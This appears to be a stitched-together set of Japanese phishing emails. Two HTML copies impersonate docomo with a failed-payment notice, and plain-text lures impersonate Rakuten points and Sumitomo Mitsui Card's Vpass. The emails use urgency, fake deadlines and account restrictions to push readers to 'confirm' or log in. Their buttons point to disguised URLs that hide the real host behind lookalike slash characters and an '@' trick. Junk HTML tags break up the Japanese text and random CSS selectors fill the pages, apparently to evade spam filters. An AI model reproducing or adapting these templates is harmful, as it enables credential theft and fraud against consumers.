</style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
.Jbq-Glus-Vgeoah .Swgxzedjl .Bkibiso-Igusf #Heyvjiebu-Blbxzy-Yuvwn .xxlc-snfhchy-dtghhxq #nSxmKgaOzrFy {
unicode-bidi:normal;
}
</style><style>
#Guvrzrv-Pof-Zcrmfgbmu #QFZHpBsbic .Pwukrnl-Sjnuznr #iBBTtIjMdkkFWnmSF #gDPMfn #bIRUn-VeKAhlWx-sevm .Hyfqpsutceikbojsroi .fRkgDubSmq-gtTK-fkpXuYU .Zjtrfiak-Jlmdktgxz #Mabl-Mym-Yrsw {
text-align-last:auto;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>こ<uhmhft>の</uhmhft>たび、<kswexbql>【</kswexbql>お客様<ticahssm>番</ticahssm>号】<ktslrrf>様</ktslrrf>の<vbcyeyb>【</vbcyeyb>202<xvr>5</xvr>年<mknnuzto>0</mknnuzto>6<bmralm>月</bmralm>】分の<vqtxqkyb>料</vqtxqkyb>金<opgbht>の</opgbht>お<eek>支</eek>払<gil>い</gil>が正常<hbrrsyv>に</hbrrsyv>完了し<otco>な</otco>かっ<dadkaex>た</dadkaex>ことを<ialzo>お</ialzo>知らせ<foguez>い</foguez>たし<igunrhbp>ま</igunrhbp>す。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://wkdl.com∕ieqbx∕dbxjmn∕jrgcwbx∕luthzcdjx∕uflrxu∕otjca∕gjxhki@bcye.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
【緊急】楽天ポイント未反映の緊急対応のお願いJZ=79074261335947
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各
位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監
査において、お客
様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知
内容未加算ポイント:4,930ポイント有効期限:本通知受信後72時間原因:登録情報
と取引データの不一致によるシステム処理の遅延
。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算
されます[。手続きを実施 本件は、ポイントの有効期限
が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手
続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確
認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment,
Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
Vpass情報を更新してください.
不正な使用の可能性があるため
カードのご利用にいくつかの制限を設定いたしました。
「ご本人さまの利用であるかを回答ください。
ご回答をいただけない場合、サービスのご利用制限が継続されることがございますので。
予めご了承くださいますようお願い申し上げます
ご利用確認はこちら
※正確な情報をご記入くださいますようお願い申し上げます。
■発行元
三井住友カード株式会社
大阪市中央区今橋4-5-15
ドコモの請求金額の支払いについてKR=70010768388061
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]れぃタヲメダソヤノ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
#Psyczonm-Eodmektj-Siovkhn #Ziovas-Auz-Oog #riwgkqanq-uhro-pbmhpscuc #Ldthu-Mwvbgpso-Johsd #AOMeeCCMSynEuUTbEjLZ .EcuMmRHPWk-mAbG-porugx {
border-top-right-radius:;
background-repeat:repeat;
}
</style><style>
#Sgkswdasvhxfrijfqjzz .Fkudcmgo-Nwfytoq .yYvjxhEK-qojipClpe #Otjs-Cllctcjcy-Ugizntlf #yjogowql-fbmqadgspe .vkbtalmdobk #Xwfftqa {
text-transform:none;
border-style:none;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>この<apyhyluz>た</apyhyluz>び、<kzrkh>【</kzrkh>お客<nimg>様</nimg>番号】<ttqoid>様</ttqoid>の<vfgsi>【</vfgsi>20<sxu>2</sxu>5年0<owkjo>6</owkjo>月】分<ylgdqvz>の</ylgdqvz>料金の<hxlwdy>お</hxlwdy>支<ksyafvk>払</ksyafvk>いが<sbwigz>正</sbwigz>常に完<laob>了</laob>しな<iuolajwi>か</iuolajwi>った<qzwt>こ</qzwt>とを<qwlcdyi>お</qwlcdyi>知らせ<xun>い</xun>た<attvqgqk>し</attvqgqk>ます。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://qlaz.com∕dfuwfzur∕cowbi∕kybkiishcb∕ylxyw∕pnurkjo∕fvsrdcie∕gemfgflxru@bcye.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>